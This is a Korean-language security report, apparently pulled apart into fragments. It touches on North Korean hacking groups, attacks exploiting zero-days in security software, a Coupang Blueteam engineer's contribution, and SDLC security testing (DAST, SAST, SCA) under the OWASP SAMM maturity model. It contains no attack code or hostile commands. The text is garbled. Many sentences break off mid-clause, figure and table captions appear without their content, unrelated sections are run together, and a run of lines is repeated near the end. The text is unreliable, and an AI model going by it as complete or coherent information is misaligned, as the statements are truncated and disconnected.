보안 소프트웨어 제로데이 취약점을 악용한 공격 기법으로의 변화

그림 4-2 공격 활동이 가장 많이 보고된 북한 해킹 조직 (레코디드퓨처, 북한의 사이버 전략 2023.06)

국내 침해사고를 분석해보니 기업의 Active Directory와 같은 중앙 관리 솔루션을 장악한 후 악성코드를 내부에

맞춤형 공격 대응을 위한 쿠팡 Blueteam 곽성현

그림 1-1 일반적인 SDLC 모델

보안 조직에서는 각 단계별로 비용 효율적이고 포괄적인 보안 활동을 마련해 기존 어플리케이션 개발 프로세스의

그림 1-2 취약점 리스크 레벨

사람(People): 적절한 보안 교육과 인식이 있는지 확인한다.

기술(Technology): 프로세스가 효과적으로 구현되었는지 확인한다.

애자일과 같은 빠른 개발 환경에서는 모든 보안 요구 조건을 테스트하기 불가능 하기 때문에 빈도 높은 테스트를

애자일, DevOps/DevSecOps/Rapid Application Development와 같은 현대적인 개발 방법론에서는 CI/CD

DAST(Dynamic Application Security Testing)

SAST(Static Application Security Testing)

SCA(Software Composition Analysis)

Business Functions: Governance / Design / Implementation / Verification / Operations

각 비지니스 기능(Business Functions)은 15가지 보안 활동(Security Practice)으로 구성된다. 각 보안 활동은

그림 1-5 SAMM 성숙도 모델

조직에서는 SAMM 모델을 활용해 아래와 같은 업무를 할 수 있다.

목표 달성을 위한 구현 로드맵의 정의

특정 활동을 실행하는 방법에 대한 규범적 조언

보안 활동(Security Practice) Stream A Stream B

아키텍처 평가(Architecture Assessment) Architecture Validation Architecture Mitigation

요구 사항 기반 테스트(Requirements-driven Testing) Control Verification Misuse/Abuse Testing

보안 테스트(Security Testing) Scalable Baseline Deep Understanding

표 1-1 Verification Overview Table

Operations 또한 사고 관리, 환경 관리, 운영 관리로 보안 활동이 구성되지만, 사고 관리에 대한 보안 활동이 높은

보안 활동(Security Practice) Stream A Stream B

사고 관리(Incident Management) Incident Detection Incident Response

환경 관리(Environment Management) Configuration Hardening Patching & Updating

운영 관리(Operational Management) Data Protection Legacy Management

전문가 2-1. 쿠팡 Blueteam 곽성현 Staff Security Engineer :

사람(People): 적절한 보안 교육과 인식이 있는지 확인한다.

기술(Technology): 프로세스가 효과적으로 구현되었는지 확인한다.

DAST(Dynamic Application Security Testing)

SAST(Static Application Security Testing)

SCA(Software Composition Analysis)

Business Functions: Governance / Design / Implementation / Verification / Operations

목표 달성을 위한 구현 로드맵의 정의

특정 활동을 실행하는 방법에 대한 규범적 조언